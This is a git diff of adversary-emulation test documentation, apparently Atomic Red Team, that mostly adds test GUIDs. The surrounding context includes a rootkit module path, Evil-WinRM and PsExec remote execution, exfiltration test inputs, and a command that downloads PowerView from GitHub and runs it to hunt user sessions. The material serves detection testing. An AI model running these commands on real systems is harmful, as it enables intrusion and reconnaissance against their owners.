| rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -104,7 +112,7 @@ sudo depmod -a
##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
##### Check Prereq Commands:
```bash
-if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
@@ -136,10 +144,14 @@ This will simulate hiding a process.
**Supported Platforms:** Windows
+**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys|
| puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe|
@@ -159,7 +171,7 @@ This will simulate hiding a process.
##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
+if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md
index 4ddc6913..35bd3edd 100644
--- a/atomics/T1016/T1016.md
+++ b/atomics/T1016/T1016.md
@@ -33,6 +33,10 @@ Upon successful execution, cmd.exe will spawn multiple commands to list network
**Supported Platforms:** Windows
+**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
+
+
+
@@ -63,6 +67,10 @@ Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules.
**Supported Platforms:** Windows
+**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
+
+
+
@@ -89,6 +97,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
+
+
+
@@ -118,6 +130,10 @@ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config works
**Supported Platforms:** Windows
+**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
+
+
+
@@ -148,10 +164,14 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
**Supported Platforms:** Windows
+**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt|
| portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
@@ -201,7 +221,7 @@ Remove-Item -ErrorAction ignore "#{output_file}"
##### Description: Test requires #{port_file} to exist
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{port_file}") {exit 0} else {exit 1}
+if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -222,10 +242,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -244,7 +268,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -263,10 +287,14 @@ A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
+**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat|
@@ -296,6 +324,10 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
**Supported Platforms:** macOS
+**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+
+
+
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index eff14164..5d28a39a 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -39,6 +39,10 @@ Upon successful execution, cmd.exe will execute `net.exe view` and display resul
**Supported Platforms:** Windows
+**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
+
+
+
@@ -66,6 +70,10 @@ Upon successful execution, cmd.exe will execute cmd.exe against Active Directory
**Supported Platforms:** Windows
+**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
+
+
+
@@ -92,10 +100,14 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
**Supported Platforms:** Windows
+**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | String | domain.local|
@@ -123,6 +135,10 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
**Supported Platforms:** Windows
+**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
+
+
+
@@ -149,6 +165,10 @@ Upon successful execution, cmd.exe will execute arp to list out the arp cache. O
**Supported Platforms:** Windows
+**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
+
+
+
@@ -175,6 +195,10 @@ Upon successful execution, sh will execute arp to list out the arp cache. Output
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
+
+
+
@@ -192,7 +216,7 @@ arp -a | grep -v '^?'
##### Description: Check if arp command exists on the machine
##### Check Prereq Commands:
```sh
-if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
+if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
@@ -213,10 +237,14 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Subnet used for ping sweep. | string | 1|
| stop_host | Subnet used for ping sweep. | string | 254|
@@ -246,6 +274,10 @@ Upon successful execution, powershell will identify the ip range (via ipconfig)
**Supported Platforms:** Windows
+**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
+
+
+
@@ -277,10 +309,14 @@ Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
+**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username including domain. | string | domain\user|
| acct_pass | Account password. | string | password|
@@ -301,7 +337,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```powershell
-if (python --version) {exit 0} else {exit 1}
+if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -310,7 +346,7 @@ echo "Python 3 must be installed manually"
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```powershell
-if (pip3 -V) {exit 0} else {exit 1}
+if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -319,7 +355,7 @@ echo "PIP must be installed manually"
##### Description: adidnsdump must be installed and part of PATH
##### Check Prereq Commands:
```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -339,10 +375,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -361,7 +401,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -381,10 +421,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -403,7 +447,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md
index 697f4045..3c62c9dd 100644
--- a/atomics/T1020/T1020.md
+++ b/atomics/T1020/T1020.md
@@ -19,10 +19,14 @@ Deletes a created file
**Supported Platforms:** Windows
+**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | String | C:\temp\T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|
diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md
index d9bb0d80..1d647cd1 100644
--- a/atomics/T1021.001/T1021.001.md
+++ b/atomics/T1021.001/T1021.001.md
@@ -21,10 +21,14 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
**Supported Platforms:** Windows
+**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")|
| domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
@@ -56,7 +60,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -75,10 +79,14 @@ Attempt an RDP session via Remote Desktop Application over Powershell
**Supported Platforms:** Windows
+**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName | String | WIN-DC|
| username | Username | String | Administrator|
diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md
index 001dd7b8..6cfb82c9 100644
--- a/atomics/T1021.002/T1021.002.md
+++ b/atomics/T1021.002/T1021.002.md
@@ -25,10 +25,14 @@ Connecting To Remote Shares
**Supported Platforms:** Windows
+**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | String | DOMAIN\Administrator|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -57,10 +61,14 @@ Map Admin share utilizing PowerShell
**Supported Platforms:** Windows
+**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| share_name | Examples C$, IPC$, Admin$ | String | C$|
| map_name | Mapped Drive Letter | String | g|
@@ -88,10 +96,14 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
**Supported Platforms:** Windows
+**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe|
| remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|
@@ -112,7 +124,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -135,10 +147,14 @@ This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
+**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
| command_to_execute | Command to execute for output. | String | hostname|
diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md
index 2ddef964..a51150c8 100644
--- a/atomics/T1021.003/T1021.003.md
+++ b/atomics/T1021.003/T1021.003.md
@@ -27,10 +27,14 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
+**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | localhost|
diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md
index 9dca5875..4a0d0636 100644
--- a/atomics/T1021.006/T1021.006.md
+++ b/atomics/T1021.006/T1021.006.md
@@ -23,6 +23,10 @@ Upon successful execution, powershell will "Enable-PSRemoting" allowing for remo
**Supported Platforms:** Windows
+**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
+
+
+
@@ -49,10 +53,14 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
**Supported Platforms:** Windows
+**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host_name | Remote Windows Host Name | String | localhost|
| remote_command | Command to execute on remote Host | String | ipconfig|
@@ -79,10 +87,14 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
**Supported Platforms:** Windows
+**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | Domain\Administrator|
| destination_address | Remote Host IP or Hostname | string | Target|
@@ -103,7 +115,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
##### Description: Computer must have Ruby Installed
##### Check Prereq Commands:
```powershell
-if (ruby -v) {exit 0} else {exit 1}
+if (ruby -v) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -114,7 +126,7 @@ Start-Process $file1 /S;
##### Description: Computer must have Evil-WinRM installed
##### Check Prereq Commands:
```powershell
-if (evil-winrm -h) {exit 0} else {exit 1}
+if (evil-winrm -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md
index f7e9f706..efb354ce 100644
--- a/atomics/T1027.001/T1027.001.md
+++ b/atomics/T1027.001/T1027.001.md
@@ -19,10 +19,14 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
@@ -45,7 +49,7 @@ rm #{file_to_pad}
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
##### Check Prereq Commands:
```bash
-if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
+if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md
index 4a353029..8f8c16f1 100644
--- a/atomics/T1027.002/T1027.002.md
+++ b/atomics/T1027.002/T1027.002.md
@@ -24,10 +24,14 @@ No other protection/compression were applied.
**Supported Platforms:** Linux
+**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
@@ -60,10 +64,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
+**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
@@ -94,10 +102,14 @@ No other protection/compression were applied.
**Supported Platforms:** macOS
+**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
@@ -130,10 +142,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
+**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md
index c5d39e0b..004bcf72 100644
--- a/atomics/T1027.004/T1027.004.md
+++ b/atomics/T1027.004/T1027.004.md
@@ -20,10 +20,14 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
**Supported Platforms:** Windows
+**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output compiled binary | Path | C:\Windows\Temp\T1027.004.exe|
| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder\T1027.004\src\calc.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
##### Description: C# file must exist on disk at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1}
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -70,10 +74,14 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
**Supported Platforms:** Windows
+**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe|
@@ -92,7 +100,7 @@ Invoke-Expression #{input_file}
##### Description: exe file must exist on disk at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1}
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md
index 9f34ff74..e40093ff 100644
--- a/atomics/T1027/T1027.md
+++ b/atomics/T1027/T1027.md
@@ -33,6 +33,10 @@ Upon successful execution, sh will execute art.sh, which is a base64 encoded com
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb
+
+
+
@@ -62,10 +66,14 @@ Upon successful execution, powershell will execute an encoded command and stdout
**Supported Platforms:** Windows
+**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -97,10 +105,14 @@ Upon successful execution, powershell will execute encoded command and read/writ
**Supported Platforms:** Windows
+**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software\Microsoft\Windows\CurrentVersion|
| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
@@ -138,10 +150,14 @@ Mimic execution of compressed executable. When successfully executed, calculator
**Supported Platforms:** Windows
+**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
@@ -166,7 +182,7 @@ del /Q "%temp%\T1027.zip" >nul 2>nul
##### Description: T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
##### Check Prereq Commands:
```powershell
-if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
+if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -188,10 +204,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
**Supported Platforms:** Windows
+**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
| sender | sender email | string | test@corp.com|
@@ -221,10 +241,14 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
**Supported Platforms:** Windows
+**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the XLSM file | path | PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm|
| ip_address | Destination IP address | string | 127.0.0.1|
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index db1e43f3..77b26949 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -15,10 +15,14 @@ Take a file/directory, split it into 5Mb chunks
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | File name | Path | T1030_urandom|
| folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
@@ -43,7 +47,7 @@ if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
##### Description: The file must exist for the test to run.
##### Check Prereq Commands:
```sh
-if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
+if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
```
##### Get Prereq Commands:
```sh
diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
index 9c9b5bfe..a491d1e9 100644
--- a/atomics/T1033/T1033.md
+++ b/atomics/T1033/T1033.md
@@ -24,10 +24,14 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
**Supported Platforms:** Windows
+**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | localhost|
@@ -62,6 +66,10 @@ Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
+
+
+
@@ -88,6 +96,10 @@ Find existing user session on other computers. Upon execution, information about
**Supported Platforms:** Windows
+**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
+
+
+
@@ -95,6 +107,7 @@ Find existing user session on other computers. Upon execution, information about
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
```
diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml
index 98369491..2628605d 100644
--- a/atomics/T1033/T1033.yaml
+++ b/atomics/T1033/T1033.yaml
@@ -48,5 +48,6 @@ atomic_tests:
- windows
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
name: powershell
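Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line replaces the process-wide protocol set rather than extending it, so on hosts whose .NET default already negotiates newer protocols the IWR call that follows is restricted to TLS 1.2 only. The additive form `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12` keeps whatever is already enabled and still turns on TLS 1.2 where it was missing. A one-line PowerShell comment inside the command block stating why the line exists would help the next maintainer, since the reason is not visible here — presumably the default protocol set on older Windows PowerShell fails to negotiate with the raw.githubusercontent.com endpoint; e.g. `# ensure TLS 1.2 is available for the IWR download below`. The same line appears in the T1033.md hunk earlier in this diff, which appears to be generated from this yaml, so that copy should follow whatever form is chosen here. The atomic test entry this `command:` belongs to starts outside the hunk.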
diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md
index 53f7811f..c2f528f3 100644
--- a/atomics/T1036.003/T1036.003.md
+++ b/atomics/T1036.003/T1036.003.md
@@ -33,6 +33,10 @@ Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest,
**Supported Platforms:** Windows
+**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717
+
+
+
@@ -64,6 +68,10 @@ Upon successful execution, sh is renamed to `crond` and executed.
**Supported Platforms:** Linux
+**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556
+
+
+
@@ -95,6 +103,10 @@ Upon successful execution, cscript.exe is renamed as notepad.exe and executed fr
**Supported Platforms:** Windows
+**auto_generated_guid:** 3a2a578b-0a01-46e4-92e3-62e2859b42f0
+
+
+
@@ -126,6 +138,10 @@ Upon execution, no windows will remain open but wscript will have been renamed t
**Supported Platforms:** Windows
+**auto_generated_guid:** 24136435-c91a-4ede-9da1-8b284a1c1a23
+
+
+
@@ -157,6 +173,10 @@ Upon successful execution, powershell.exe is renamed as taskhostw.exe and execut
**Supported Platforms:** Windows
+**auto_generated_guid:** ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
+
+
+
@@ -188,10 +208,14 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
**Supported Platforms:** Windows
+**auto_generated_guid:** bc15c13f-d121-4b1f-8c7d-28d95854d086
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| outputfile | path of file to execute | path | ($env:TEMP + "\svchost.exe")|
| inputfile | path of file to copy | path | PathToAtomicsFolder\T1036.003\bin\T1036.003.exe|
@@ -217,7 +241,7 @@ Remove-Item #{outputfile} -Force -ErrorAction Ignore
##### Description: Exe file to copy must exist on disk at specified location (#{inputfile})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{inputfile}) {exit 0} else {exit 1}
